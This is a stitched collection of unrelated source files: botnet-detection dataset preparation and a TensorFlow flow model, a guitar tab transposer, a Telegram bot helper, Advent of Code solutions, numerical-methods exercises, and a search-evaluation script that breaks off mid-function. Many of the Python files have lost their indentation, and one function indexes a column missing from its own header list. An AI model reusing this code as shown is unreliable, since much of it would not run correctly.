'StdDevOfPacketLength': sf.aggregate.SELECT_ONE('StdDevOfPacketLength'),
'RatioOfSameLengthPackets': sf.aggregate.SELECT_ONE('RatioOfSameLengthPackets'),
'Duration': sf.aggregate.SELECT_ONE('Duration'),
'AveragePacketLength': sf.aggregate.SELECT_ONE('AveragePacketLength'),
'AverageBitsPerSecond': sf.aggregate.SELECT_ONE('AverageBitsPerSecond'),
'AveragePacketsPerSecond': sf.aggregate.SELECT_ONE('AveragePacketsPerSecond'),
'IsNull': sf.aggregate.SELECT_ONE('IsNull'),
'NumberOfNullPackets': sf.aggregate.SELECT_ONE('NumberOfNullPackets')
})
flow_list.save(output_url)
```
#### File: MinimumFeaturizer/scripts/featurize_packets.py
```python
import csv
headers = ['Source Port', 'Destination Port', 'Score', 'Source', 'Destination', 'Protocol', 'IP_Flags', 'Length', 'Protocols in frame', 'Time', 'tcp_Flags', 'TCP Segment Len', 'udp_Length']
def score_packets(input_url='data/raw_packets.csv', output_url='data/scored_packets.csv'):
'''
Adds score indicators to botnets
'''
print("Transforming initial data csv")
with open(output_url, 'w') as raw_flows:
writer = csv.writer(raw_flows, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
with open(input_url) as csvfile:
      writer.writerow(headers + ["Score"])
first = True
for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
if first is True:
first = False
continue
if row[headers.index('Label')] == "BENIGN":
row.append(0)
else:
row.append(1)
writer.writerow(row)
def featurize_packets(input_url='data/scored_packets.csv', output_url='data/featurized_packets.csv'):
'''
Featurizes packets
'''
pass
```
#### File: datasets/basic_iscx/generate.py
```python
from ..utils.network_utils import upload_file
from . import config, preprocess_file
from .logger import set_logger
import numpy as np
def main():
'''
Generates dataset out of ISCX.
'''
set_logger.info("Beginning ISCX dataset generation")
##############################
### Generate training dataset
# Preprocess file
train_X, train_Y = preprocess_file(
config.RAW_TRAINING_DATASET_PATH)
set_logger.info("Training dataset preprocessed.")
# Dumping training features
with open(config.DUMPS_DIR + "train_X_basic" + ".np",
'wb') as f:
np.save(f, np.array(train_X, dtype=np.float32))
set_logger.info("Training features dumped.")
del(train_X)
# Dumping training labels
with open(config.DUMPS_DIR + "train_Y_basic" + ".np",
'wb') as f:
np.save(f, np.array(train_Y))
set_logger.info("Training labels dumped.")
del(train_Y)
##############################
##############################
### Generate testing dataset
# Preprocess file
test_X, test_Y = preprocess_file(
config.RAW_TESTING_DATASET_PATH)
set_logger.info("Testing dataset preprocessed.")
# Dumping testing features
with open(config.DUMPS_DIR + "test_X_basic" + ".np",
'wb') as f:
np.save(f, np.array(test_X, dtype=np.float32))
set_logger.info("Testing features dumped.")
del(test_X)
# Dumping testing labels
with open(config.DUMPS_DIR + "test_Y_basic" + ".np",
'wb') as f:
np.save(f, np.array(test_Y))
set_logger.info("Testing labels dumped.")
del(test_Y)
##############################
##############################
### Upload files
upload_file("datasets", "iscx_train_X_basic",
config.DUMPS_DIR + "train_X_basic" + ".np")
upload_file("datasets", "iscx_train_Y_basic",
config.DUMPS_DIR + "train_Y_basic" + ".np")
upload_file("datasets", "iscx_test_X_basic",
config.DUMPS_DIR + "test_X_basic" + ".np")
upload_file("datasets", "iscx_test_Y_basic",
config.DUMPS_DIR + "test_Y_basic" + ".np")
##############################
return None
if __name__ == "__main__":
main()
```
#### File: datasets/iscx/generate.py
```python
from ..utils.network_utils import upload_file
from . import config, preprocess_file
from .logger import set_logger
import numpy as np
import argparse
def main(n_steps):
'''
Generates dataset out of ISCX.
'''
set_logger.info("Beginning ISCX dataset generation")
set_logger.info("Number of steps: " + str(n_steps))
##############################
### Generate training dataset
# Preprocess file
train_X, train_Y = preprocess_file(
config.RAW_TRAINING_DATASET_PATH, n_steps)
set_logger.info("Training dataset preprocessed.")
# Dumping training features
with open(config.DUMPS_DIR + "train_X_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(train_X, dtype=np.float32))
set_logger.info("Training features dumped.")
del(train_X)
# Dumping training labels
with open(config.DUMPS_DIR + "train_Y_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(train_Y))
set_logger.info("Training labels dumped.")
del(train_Y)
##############################
##############################
### Generate testing dataset
# Preprocess file
test_X, test_Y = preprocess_file(
config.RAW_TESTING_DATASET_PATH, n_steps)
set_logger.info("Testing dataset preprocessed.")
# Dumping testing features
with open(config.DUMPS_DIR + "test_X_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(test_X, dtype=np.float32))
set_logger.info("Testing features dumped.")
del(test_X)
# Dumping testing labels
with open(config.DUMPS_DIR + "test_Y_" + str(n_steps) + ".np",
'wb') as f:
np.save(f, np.array(test_Y))
set_logger.info("Testing labels dumped.")
del(test_Y)
##############################
##############################
### Upload files
upload_file("datasets", "iscx_train_X_" + str(n_steps),
config.DUMPS_DIR + "train_X_" + str(n_steps) + ".np")
upload_file("datasets", "iscx_train_Y_" + str(n_steps),
config.DUMPS_DIR + "train_Y_" + str(n_steps) + ".np")
upload_file("datasets", "iscx_test_X_" + str(n_steps),
config.DUMPS_DIR + "test_X_" + str(n_steps) + ".np")
upload_file("datasets", "iscx_test_Y_" + str(n_steps),
config.DUMPS_DIR + "test_Y_" + str(n_steps) + ".np")
##############################
return None
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-steps", "--steps", help="Steps in sequence",
type=int, required=True)
main(n_steps=parser.parse_args().steps)
```
#### File: datasets/isot/load.py
```python
from . import config
from .logger import set_logger
from ..utils import shaping_utils
import pickle
def load(test_size, n_steps):
'''
Loads preprocessed data dump if possible.
'''
try:
#######################################
### Dataset load.
with open(config.DUMPS_DIR + "dataset_" + str(n_steps) + ".p", "rb") as f:
set_logger.info("Dataset exists. Processing...")
X, Y = pickle.load(f)
# Shuffle dataset
X, Y = shaping_utils.shuffle_twins(X, Y)
# Cut testing features
test_X = X[:test_size]
train_X = X[test_size:]
del(X)
# Cut testing labels
test_Y = Y[:test_size]
train_Y = Y[test_size:]
del(Y)
#######################################
return (train_X, train_Y), (test_X, test_Y)
except (EOFError, OSError, IOError) as e:
set_logger.info("Dataset does not exist. Returning None.")
return None
def load_full_test(n_steps):
'''
Loads preprocessed data dump for test if possible.
'''
try:
with open(config.DUMPS_DIR + "dataset_" + str(n_steps) + ".p", "rb") as f:
set_logger.info("Dataset exists. Processing...")
X, Y = pickle.load(f)
X, Y = shaping_utils.shuffle_twins(X, Y)
return X, Y
except (EOFError, OSError, IOError) as e:
set_logger.info("Dataset does not exist. Returning None.")
return None
```
#### File: src/models/flow_model.py
```python
from ..model_base import Base, SequenceLayers
import tensorflow as tf
class FlowModel(Base, SequenceLayers):
'''
Model for predicting on flows.
'''
def __init__(self, sess, flags, logger, **kargs):
logger.debug('Instantiated flow model')
Base.__init__(self, sess, flags, logger, **kargs)
def build_model(self):
'''
Build the flow model.
'''
self.logger.debug('Building model...')
flags = self.flags
self.x = tf.placeholder(
tf.float32, (flags.s_batch, flags.n_steps, flags.n_features))
self.target = tf.placeholder(tf.float32,
(flags.s_batch, flags.n_classes))
encoder_config = {
'n_batches': flags.s_batch,
'n_steps': flags.n_steps,
'n_features': flags.n_features,
'h_gru': flags.h_gru,
'h_dense': flags.o_gru
}
encoded_state = self._encoder_layer(
self.x, "encoder", encoder_config)
dense_config = {
'n_batches': flags.s_batch,
'n_input': flags.o_gru,
'n_hidden': flags.h_dense,
'n_output': flags.o_dense
}
dense_state = self._dense_layer(
encoded_state, "dense", dense_config)
predictor_config = {
'n_batches': flags.s_batch,
'n_input': flags.o_dense,
'n_classes': flags.n_classes
}
self.prediction = self._prediction_layer(
dense_state,
'predictor',
predictor_config)
self.loss = self._define_optimization_vars(
self.target,
self.prediction,
[1, 1],
flags.v_regularization
)
self.tpr, self.fpr, self.acc = self._define_binary_metrics(
self.target,
self.prediction,
)
optimizer = tf.train.AdamOptimizer()
self.optim = optimizer.minimize(
self.loss,
var_list=tf.trainable_variables(),
global_step=self.global_step)
self.logger.debug('Model built.')
return self
```
#### File: tests/model_base/broken_test_StandardLayers.py
```python
from ...src.model_base import StandardLayers
import tensorflow as tf
def test_prediction():
X = tf.placeholder(tf.float32, (3, 7))
predictor_config = {
'n_batches': 3,
'n_input': 7,
'n_classes': 5
}
prediction = StandardLayers()._prediction_layer(
X, 'predictor', predictor_config)
assert(prediction.shape == (3, 5))
assert(prediction.dtype == tf.float32)
def test_optimizations():
prediction = tf.placeholder(tf.float32, (3, 5))
target = tf.placeholder(tf.float32, (3, 5))
loss, acc = StandardLayers()._define_optimization_vars(
target, prediction, [1, 1, 0, 0, 1], 0.1)
assert(loss.shape == [])
assert(loss.dtype == tf.float32)
assert(acc.shape == [])
assert(acc.dtype == tf.float32)
def test_binary_metrics():
prediction = tf.placeholder(tf.float32, (3, 5))
target = tf.placeholder(tf.float32, (3, 5))
TPR, FPR, acc = StandardLayers()._define_binary_metrics(
target, prediction)
assert(TPR.shape == [])
assert(TPR.dtype == tf.float32)
assert(FPR.shape == [])
assert(FPR.dtype == tf.float32)
``` |
{
"source": "joaocmd/Tab-Transposer",
"score": 4
} |
#### File: joaocmd/Tab-Transposer/tab_transposer.py
```python
import re
def check_strs_in_line(line, strs):
"""string x list of strings -> bool. Returns whether any of the strings in strs is part
of the string line."""
for str in strs:
if str in line:
return True
return False
def replace_numbers_in_line(line, transpose_value):
"""string x int -> string. Returns a new string where the numbers found in line
are replaced by themselves - transpose_value."""
    # Sort so that we start by replacing the lower numbers, avoiding
    # conflicts with the larger ones.
numbers = sorted(set(int(i) for i in re.findall(r"\d+", line)))
for n in numbers:
new_number = n-transpose_value
new_number_str = str(n-transpose_value)
if n >= 10 and new_number < 10:
            # Add a dash to compensate for the lost character
new_number_str = "-" + new_number_str
line = line.replace(str(n), new_number_str)
return line
def add_strings(l, msg):
"""list x string ->. Prints msg and appends each input line to l until it finds an emtpy
line."""
print(msg)
while True:
s = input();
if s == "":
break
l.append(s)
def main():
"""->. This is where the main program runs."""
file_name = input("File name (without \".txt\"): ")
tranpose_value = int(input("How many frets to transpose: "))
right_instrument = False
valid_strs = []
print("Press just enter to finish (with no trailing whitespace).\n")
add_strings(valid_strs, "Green light strings (e.g: Guitar 1): ")
if (len(valid_strs) == 0):
#Start replacing from the beginning.
right_instrument = True
invalid_strs = []
add_strings(invalid_strs, "Red light strings (e.g: Guitar): ")
f = open(file_name + ".txt", "r")
lines = f.readlines()
f.close()
new_file = open(file_name + "_new.txt", "w")
for line in lines:
if check_strs_in_line(line, valid_strs):
right_instrument = True
new_file.write(line)
elif check_strs_in_line(line, invalid_strs):
right_instrument = False
new_file.write(line)
elif right_instrument:
new_file.write(replace_numbers_in_line(line, tranpose_value))
else:
new_file.write(line)
new_file.close()
main()
``` |
{
"source": "joao-coimbra/cryptography-python",
"score": 4
} |
#### File: joao-coimbra/cryptography-python/utilities.py
```python
alphabet = list(map(chr, range(97, 123)))
def removeSpecialCharacters(phrase, result = ''):
for c in phrase:
if c == 'ã' or c == 'á' or c == 'à' or c == 'â' or c == 'ä':
result += 'a'
elif c == 'é' or c == 'è' or c == 'ê' or c == 'ë':
result += 'e'
elif c == 'í' or c == 'î' or c == 'ï' or c == 'ì':
result += 'i'
elif c == 'ó' or c == 'ò' or c == 'ô' or c == 'ö':
result += 'o'
elif c == 'ú' or c == 'ù' or c == 'ü':
result += 'u'
elif c == 'ç':
result += 'c'
else:
result += c
return result
``` |
{
"source": "joao-coimbra/easy-python-telegram",
"score": 2
} |
#### File: easy-python-telegram/telegram_chat/bot.py
```python
import telegram
import logging
import os
from telegram_chat.keys import *
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO
)
bot = telegram.Bot(
token=TELEGRAM_TOKEN
)
def sendMessage(text):
bot.sendMessage(
chat_id=CHAT_ID,
text=text
)
def sendImage(img, local=True):
if local:
bot.sendPhoto(
chat_id=CHAT_ID,
photo=open(f'{os.getcwd()}\\{img}', 'rb')
)
else:
bot.sendPhoto(
chat_id=CHAT_ID,
photo=img
)
``` |
{
"source": "joao-conde/advents-of-code",
"score": 3
} |
#### File: 2017/src/day20.py
```python
import re, math
from functools import reduce
input_file = open("input/day20")
particle_input = input_file.read().split("\n")
input_file.close()
def get_particle_properties(particle_id: int, particle_info: str):
pattern = "p=<(.*),(.*),(.*)>, v=<(.*),(.*),(.*)>, a=<(.*),(.*),(.*)>"
[px, py, pz, vx, vy, vz, ax, ay, az] = [
int(x) for x in re.findall(pattern, particle_info)[0]
]
return particle_id, {
"px": px,
"py": py,
"pz": pz,
"vx": vx,
"vy": vy,
"vz": vz,
"ax": ax,
"ay": ay,
"az": az,
}
# PART 1
particles_props = [
get_particle_properties(pid, particle_info)
for (pid, particle_info) in enumerate(particle_input)
]
particles_abs_accel = [
(math.sqrt(info["ax"] ** 2 + info["ay"] ** 2 + info["az"] ** 2), pid)
for pid, info in particles_props
]
particles_abs_accel.sort() # sorts by acceleration magnitude
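# With constant acceleration, distance from the origin eventually grows like |a| * t**2 / 2, so the particle with the smallest |a| stays closest in the long run.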
print(f"Closest particle to <0,0,0> in the long term: {particles_abs_accel[0][1]}")
# PART 2 (gave up on quadratic solver based solution to find if two particles ever collide)
SIMULATION_STEPS = 500
axes = ["x", "y", "z"]
position_keys = ["px", "py", "pz"]  # position components compared when checking for collisions
for _ in range(SIMULATION_STEPS):
for _, p in particles_props:
for axis in axes:
p["v" + axis] += p["a" + axis]
p["p" + axis] += p["v" + axis]
collided = []
for pid1, p1 in particles_props:
for pid2, p2 in particles_props:
if pid1 == pid2:
continue
if reduce(lambda a, b: a and b, [p1[k] == p2[k] for k in position_keys]):
collided.extend([pid1, pid2])
particles_props = [(pid, _) for (pid, _) in particles_props if pid not in collided]
print(f"Particles left after all collisions are resolved: {len(particles_props)}")
```
#### File: 2017/src/day24.py
```python
input_file = open("input/day24")
components = input_file.read().split("\n")
components = [[int(pin) for pin in component.split("/")] for component in components]
input_file.close()
def find_bridges(components, bridge, bridges):
possibleNext = [
c
for c in components
if bridge[-1][1] in c and c not in bridge and [c[1], c[0]] not in bridge
]
if len(possibleNext) != 0:
for c in possibleNext:
cBridge = bridge.copy()
if cBridge[-1][1] == c[0]:
cBridge.append(c)
elif cBridge[-1][1] == c[1]:
cBridge.append([c[1], c[0]])
find_bridges(components, cBridge, bridges)
else:
bridges.append(bridge)
return bridges
# PART 1
startComponents = [c for c in components if 0 in c]
otherComponents = [c for c in components if 0 not in c]
bridges = []
for c in startComponents:
bridges.extend(find_bridges(otherComponents, [c], []))
bridgesSums = [sum([sum(c) for c in b]) for b in bridges]
print(f"Strongest bridge strength: {max(bridgesSums)}")
# PART 2
maxLenBridge = max([len(b) for b in bridges])
longestBridges = [b for b in bridges if len(b) >= maxLenBridge]
longestBridgesSums = [sum([sum(c) for c in b]) for b in longestBridges]
# print(f'Longest and strongest bridge strength *wink wink*: {max(longestBridgesSums)}')
``` |
{
"source": "JoaoCostaIFG/IART",
"score": 3
} |
#### File: Exercises/bucket_problem/ex1.py
```python
start_state = [0, 0]
end_state = [2, 0]
# OPERATORS
def empty_left(b):
return [0, b[1]]
def empty_right(b):
return [b[0], 0]
def fill_left(b):
return [4, b[1]]
def fill_right(b):
return [b[0], 3]
def pass_to_right(b):
left_to_full = 3 - b[1]
if left_to_full > b[0]:
amount = b[0]
else:
amount = left_to_full
return [b[0] - amount, b[1] + amount]
def pass_to_left(b):
left_to_full = 4 - b[0]
if left_to_full > b[1]:
amount = b[1]
else:
amount = left_to_full
return [b[0] + amount, b[1] - amount]
# DFS
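# The state space is tiny (left bucket 0..4, right bucket 0..3 -> 20 states), so the visited list guarantees the search terminates.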
def dfs(b, visited):
if b[0] == 2: # end state
return True
if b in visited: # already visited this node
return False
visited.append(b)
# empty
if b[0] > 0:
if dfs(empty_left(b), visited):
return True
if b[1] > 0:
if dfs(empty_right(b), visited):
return True
# fill
if b[0] < 4:
if dfs(fill_left(b), visited):
return True
if b[1] < 3:
if dfs(fill_right(b), visited):
return True
# pass
if b[0] > 0 and b[1] < 3:
if dfs(pass_to_right(b), visited):
return True
if b[0] < 4 and b[1] > 0:
if dfs(pass_to_left(b), visited):
return True
return False
visited = []
dfs(start_state.copy(), visited)
print(visited)
``` |
{
"source": "JoaoCostaIFG/MNUM",
"score": 4
} |
#### File: exams/2014/1_picard_1eq.py
```python
def recorr(x):
return (4 * x**3 - x + 1)**(1 / 4)
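# Picard (fixed-point) iteration x_{k+1} = recorr(x_k); it converges when |recorr'(x)| < 1 near the fixed point.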
x = 4
print(x)
for i in range(2):
x = recorr(x)
print(x)
```
#### File: exams/2014/6_golden_rule.py
```python
from math import sin, sqrt
def f(x):
return x + ((x - 2)**2) / (sin(x) + 4)
B = (sqrt(5) - 1) / 2
A = B**2
x1 = -1
x2 = 1.5
x3 = -0.045080
x4 = 0.545085
# x3 = A * (x2 - x1) + x1
# x4 = B * (x2 - x1) + x1
print("x1:", x1, "x2:", x2, "x3:", x3, "x4:", x4)
print("f(x1)", f(x1), "f(x2)", f(x2), "f(x3)", f(x3), "f(x4)", f(x4), "\n")
for i in range(2):
if (f(x3) < f(x4)):
x2 = x4
x4 = x3
x3 = x1 + A * (x2 - x1)
else:
x1 = x3
x3 = x4
x4 = x1 + B * (x2 - x1)
print("x1:", x1, "x2:", x2, "x3:", x3, "x4:", x4)
print("f(x1)", f(x1), "f(x2)", f(x2), "f(x3)", f(x3), "f(x4)", f(x4), "\n")
```
#### File: exams/2015/1_euler1eq.py
```python
Ta = 37
def dTdt(t, T):
return -0.25 * (T - Ta)
t = 5
T = 3
h = 0.4 # aka delta_x
for i in range(2):
t += h
delta_T = dTdt(t, T) * h # aka delta_y
T += delta_T
print(t, T)
```
#### File: exams/2017/4c_euler.py
```python
from math import e
a = 30
b = 0.5
def dCdt(t, C, T):
return -e**(-b / (T + 273)) * C
def dTdt(t, C, T):
return a * e**(-b / (T + 273)) * C - b * (T - 20)
tf = 0.5
def euler(h):
t = 0
C = 2.5
T = 25
while (t < tf):
nT = T + dTdt(t, C, T) * h
nC = C + dCdt(t, C, T) * h
t += h
T = nT
C = nC
print("t:", t, "C:", C, "T:", T)
return T
h = 0.25
s = euler(h)
sl = euler(h / 2)
sll = euler(h / 4)
print("s:", s, "sl", sl, "sll", sll)
# QC
qc = (sl - s) / (sll - sl)
print("QC:", qc)
# ERR
erro = (sll - sl) / (2**1 - 1)
print("err:", erro)
```
#### File: MNUM/firsttest/q1b_2016.py
```python
import math
from time import sleep
def g(x):
return -(0.660 * x - 1) / (x - 1) + x
def gl(x):
temp = 50 * x**2 - 100 * x
return (temp + 33) / (temp + 50)
ERRR = 1e-10
x_old = False
x = 1.67
while (abs(x - x_old) > ERRR):
print("x:", x)
print("gl:", gl(x))
print()
x_old = x
x = g(x)
# sleep(1)
print("Final:", x)
```
#### File: my_tests/2019/up201806560-Joao-Costa-p4.py
```python
def dvdu(u, v):
return u * (u/2 + 1) * (v**3) + (u + 2.5) * (v**2)
# s
u = 1
v = 0.15
uf = 2
h = 0.1
while (u < uf):
v += dvdu(u, v) * h
u += h
s = v
print("h:", h, "u:", u, "v:", v)
# sl
u = 1
v = 0.15
uf = 2
h = 0.1/2
while (u < uf):
v += dvdu(u, v) * h
u += h
sl = v
print("h:", h, "u:", u, "v:", v)
# sll
u = 1
v = 0.15
uf = 2
h = 0.1/4
while (u < uf):
v += dvdu(u, v) * h
u += h
sll = v
print("h:", h, "u:", u, "v:", v)
# QC
QC = (sl - s) / (sll - sl)
print("QC:", QC)
# Erro
order_euler = 1
err = (sll - sl) / (2 ** order_euler - 1)
print("Erro:", err)
```
#### File: Pratical/Class03/bissecao.py
```python
def formula_resolvente1(a, b, c):
return (-b - (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def formula_resolvente2(a, b, c):
return (-b + (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def expr(x):
return 2 * x**2 - 5 * x - 2
def bissec(x, a, b, p):
print("Root:", x)
print("Erro absoluto max:", abs(b - a)/2)
medio = (a + b) / 2
while abs(b - a) > p:
medio = (a + b) / 2
if (expr(medio) * expr(a) <= 0):
b = medio
else:
a = medio
print("Result:", medio)
print("Erro absoluto:", x - medio)
return medio
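# Bisection halves the bracket every iteration, so roughly log2((b - a) / p) steps are needed to reach tolerance p.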
bissec(formula_resolvente1(2, -5, -2), -1, 0, 1e-10)
print()
bissec(formula_resolvente2(2, -5, -2), 2, 3, 1e-10)
```
#### File: Pratical/Class03/picard-peano.py
```python
from time import sleep
def formula_resolvente1(a, b, c):
return (-b - (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def formula_resolvente2(a, b, c):
return (-b + (b**2 - 4 * a * c) ** (1/2)) / (2 * a)
def expr(x):
# 2x^2 - 5x - 2
return 2 * x**2 - 5 * x - 2
def g(x):
# return 0.4 * (x**2 - 1)
return -(2.5 * x + 1)**0.5
def newton(s, x, p):
print("root:", s)
# print("erro absoluto max:", abs(b - a) / 2)
print()
while abs(x - s) > p:
x = g(x)
print("Erro:", abs(x - s))
sleep(0.3)
print("result:", x)
print("erro absoluto:", x - s)
return x
# newton(formula_resolvente1(2, -5, -2), -0.3, 1e-10)
# print("\n")
newton(formula_resolvente2(2, -5, -2), 2.85, 1e-10)
```
#### File: Pratical/Class09/euler_melhorado.py
```python
import math
import matplotlib.pyplot as plt
def f(x, y):
return math.pow(math.sin(x), 2)
def qc(a, b, h, f, xn, metodo):
s = metodo(a, b, h, f, xn)
sl = metodo(a, b, h/2, f, xn)
sll = metodo(a, b, h/4, f, xn)
print("qc\nerro")
qc = []
for i in range(len(s)):
numerator = sll[i*4][1] - sl[i*2][1]
if numerator == 0:
qc.append("div by 0")
print(qc[i])
continue
else:
qc.append((sl[i*2][1] - s[i][1]) / numerator)
print(qc[i], abs(qc[i] - 16))
print()
plt.show()
return qc
def rk4(x, y, dltx, f, xf, doplot=True):
points = [(x, y)]
while (x < xf):
x += dltx
dlt1 = dltx * f(x, y)
dlt2 = dltx * f(x + dltx/2, y + dlt1/2)
dlt3 = dltx * f(x + dltx/2, y + dlt2/2)
dlt4 = dltx * f(x + dltx, y + dlt3)
y += dlt1/6 + dlt2/3 + dlt3/3 + dlt4/6 # y += y + dlty
points.append((x, y))
if doplot:
x, y = zip(*points)
plt.scatter(x, y, marker=".")
return points
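# The 1/6, 1/3, 1/3, 1/6 slope weighting above is the classical fourth-order Runge-Kutta combination.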
def euler_helper(x, y, x2, y2, dltx, step):
dltx /= step
for i in range(step):
yl = f(x2, y2)
pn = y + 2 * yl * dltx
pln = f(x2, pn)
dlty = (pln + yl) / 2 * dltx
x = x2
y = y2
x2 = x + dltx
y2 = y + dlty
return y
def euler_melhorado(x, y, x2, y2, dltx, f, xf, doplot=True):
points = [(x, y)]
while (x < xf):
yl = f(x2, y2)
pn = y + 2 * yl * dltx
pln = f(x2, pn)
dlty = (pln + yl) / 2 * dltx
sll = euler_helper(x, y, x2, y2, dltx, 4)
sl = euler_helper(x, y, x2, y2, dltx, 2)
numerator = sl - (y2 + dlty)
if numerator:
kc = (sll - sl) / (sl - (y2 + dlty))
else:
kc = 2
if (abs(kc - 2) < 8):
x = x2
y = y2
x2 = x + dltx
y2 = y + dlty
points.append((x, y))
else:
dltx -= 0.1
if doplot:
x, y = zip(*points)
plt.scatter(x, y, marker=".")
return points
x = 0
y = 0
rk4res = rk4(x, y, 0.001, f, 1, False)
x2 = rk4res[-1][0]
y2 = rk4res[-1][1]
h = 1
xf = 20
euler_melhorado(x, y, x2, y2, h, f, xf, True)
plt.show()
```
#### File: Pratical/Class10/tercos-aurea.py
```python
from math import sin, sqrt
limm = 1e-5
def f(x):
return sin(x) ** 2
def const_search(xi, xf, h):
print("const_search")
    # change direction if necessary
if (f(xi) < f(xi + h)):
h = -h
while f(xi) > f(xi + h):
xi += h
print("xi:", xi, "h:", h)
return xi
def inc_search(xi, xf, h):
print("inc_search")
    # change direction if necessary
if (f(xi) < f(xi + h)):
h = -h
while f(xi) > f(xi + h):
h *= 2
xi += h
print("xi:", xi, "h:", h)
return xi
def adjust(xi, xf, xm):
# Adjust 3 points to parabola
result = xf + ((xm - xf) * (f(xi) - f(xm))) / \
(2 * (f(xm) - 2 * f(xf) + f(xi)))
print(result)
return result
def tercos(xi, xf):
# doing 10 iterations cause it seems OK for this problem
print("Tercos:")
lastx = 0
for i in range(10):
h = (xf - xi) / 3
x3 = xi + h
x4 = xf - h
if f(x4) < f(x3):
xi = x3
lastx = x4
elif f(x3) <= f(x4):
            # TODO: handle the == case
            # (we could discard both ends of the interval)
xf = x4
lastx = x3
print("xi:", xi, "xf:", xf)
print("fi:", f(xi), "ff:", f(xf))
return (xi, xf, lastx)
def aurea(xi, xf):
# doing 10 iterations cause it seems OK for this problem
print("Aurea:")
B = (sqrt(5) - 1) / 2 # golden ratio
A = B ** 2
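    # B ~= 0.618 is the inverse golden ratio; note that A = B**2 = 1 - B ~= 0.382.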
lastx = 0
x3 = xi + A * (xf - xi)
x4 = xi + B * (xf - xi)
for i in range(10):
if f(x4) < f(x3):
xi = x3
lastx = x3 = x4
x4 = x3 + B * (xf - x3)
elif f(x3) <= f(x4):
xf = x4
lastx = x4 = x3
x3 = xi + B * (xf - xi)
print("xi:", xi, "xf:", xf)
print("fi:", f(xi), "ff:", f(xf))
return (xi, xf, lastx)
# f is convex from -1 to 1
xi = -1
xf = 1
h = 0.1
# tercos
xi = const_search(xi, xf, h)
points = tercos(xi, xf)
result = adjust(*points) # the star (*) unpacks the sequence
# f is convex from -1 to 1
xi = -1
xf = 1
h = 0.1
# aurea
xi = const_search(xi, xf, h)
points = aurea(xi, xf)
result = adjust(*points) # the star (*) unpacks the sequence
``` |
{
"source": "JoaoCostaIFG/PRI",
"score": 3
} |
#### File: PRI/Proj/db2json.py
```python
import pandas as pd
import sqlite3
conn = sqlite3.connect("data/data.db")
df_story = pd.read_sql_query("Select * from Story", conn)
df_type = pd.read_sql_query("Select * from Type", conn)
df_url = pd.read_sql_query("Select * from Url", conn)
df = df_story.join(df_type, on="story_type")
df = df.merge(df_url, left_on="story_id", right_on="url_story", how="left")
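# The left merge keeps stories that have no matching URL row (their url columns become NaN).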
df["story_time"] = pd.to_datetime(df["story_time"], unit="s")
df["story_time"] = df["story_time"].dt.strftime("%Y-%m-%dT%H:%M:%S")
df.drop(["story_type", "type_id", "url_id", "url_story"], axis=1, inplace=True)
df.rename(
columns={
"story_by": "story_author",
"type_name": "story_type",
"url_url": "url",
},
inplace=True,
)
def filter_comments(id):
df_slice = df_comment[df_comment["comment_parent"] == id].copy()
df_slice.drop(["comment_parent"], axis=1, inplace=True)
df_slice["comment_time"] = pd.to_datetime(df_slice["comment_time"], unit="s")
df_slice["comment_time"] = df_slice["comment_time"].dt.strftime("%Y-%m-%dT%H:%M:%S")
df_slice.rename(
columns={
"comment_by": "comment_author",
},
inplace=True,
)
return df_slice
df_comment = pd.read_sql_query("Select * from Comment", conn)
df["comments"] = df["story_id"].map(filter_comments)
df.to_json("hackersearch.json", orient="records")
```
#### File: Proj/evaluation/evaluate.py
```python
from string import ascii_uppercase as alphabet
import sys
import json
def ap(docs, n=10):
"""Average Precision"""
precision_values = [
len([
doc
for doc in docs[:idx]
if doc["relevant"] == "true"
]) / idx
for idx in range(1, n + 1)
]
return sum(precision_values) / len(precision_values)
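# Note: this AP averages precision@k over every rank 1..n, not only at the relevant ranks.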
def p10(docs, n=10):
"""Precision at N"""
return len([doc for doc in docs[:n] if doc['relevant'] == "true"]) / n
def rec(docs, n=10):
"""Recall"""
len_relevant = getNoRelevants(docs)
return len([
doc for doc in docs[:n]
if doc['relevant'] == "true"
]) / len_relevant
def fB(docs, beta, n=10):
"""F1 Score"""
precision = p10(docs, n)
recall = rec(docs, n)
return (1 + beta ** 2) * (precision * recall) / ((beta ** 2 * precision) + recall)
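# With beta < 1 (e.g. 0.5) the F-beta score weights precision more heavily than recall.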
def getNoRelevants(docs):
return sum([doc["relevant"] == "true" for doc in docs])
def gen_precisions(docs, n=10):
return [getNoRelevants(docs[:idx]) / idx
for idx, _ in enumerate(docs[:n], start=1)]
def gen_recalls(docs, n=10):
len_relevant = getNoRelevants(docs)
return [
len([
doc for doc in docs[:idx]
if doc['relevant'] == "true"
]) / len_relevant
for idx, _ in enumerate(docs[:n], start=1)
]
def get_precision_recalls(docs, n=10):
import numpy as np
recall_values = gen_recalls(docs, n)
precision_values = gen_precisions(docs, n)
# Let's scatterplot all recall-precision values
# And lineplot using sklearn the curve with intermediate steps
recall_precision_dict = {
recall_values[i]: precision_values[i] for i in range(len(recall_values))}
# Extend recall_values to include traditional steps for a better curve(0.1, 0.2 ...)
extended_recall = recall_values.copy()
extended_recall.extend([step for step in np.arange(
0.1, 1.1, 0.1) if step not in recall_values])
extended_recall = sorted(set(extended_recall))
# Extend matching dict to include these new intermediate steps
for idx, step in enumerate(extended_recall):
if step not in recall_precision_dict: # If we don't have info on this step
if extended_recall[idx-1] in recall_precision_dict:
recall_precision_dict[step] = recall_precision_dict[extended_recall[idx-1]]
else:
recall_precision_dict[step] = recall_precision_dict[extended_recall[idx+1]]
# Values with 0 must be verified, idk why
if 0 not in recall_precision_dict:
recall_precision_dict[0] = recall_precision_dict[0.1]
return recall_values, precision_values, recall_precision_dict
# Plots multiple recall-precision plots, for each doc
def plot_recall_precision(recalls_precisions, legends=[], markers=["s", "o", "^", "D"]):
import matplotlib.pyplot as plt
from sklearn.metrics import PrecisionRecallDisplay
a = plt.figure()
axes = a.add_axes([0.1, 0.1, 0.8, 0.8])
# Use dict with extended values to draw line
i = 0
for recalls, precisions, recall_dict in recalls_precisions:
recall_keys = sorted(list(recall_dict.keys()))
precision_values = [recall_dict[key] for key in recall_keys]
disp = PrecisionRecallDisplay(precision_values, recall_keys)
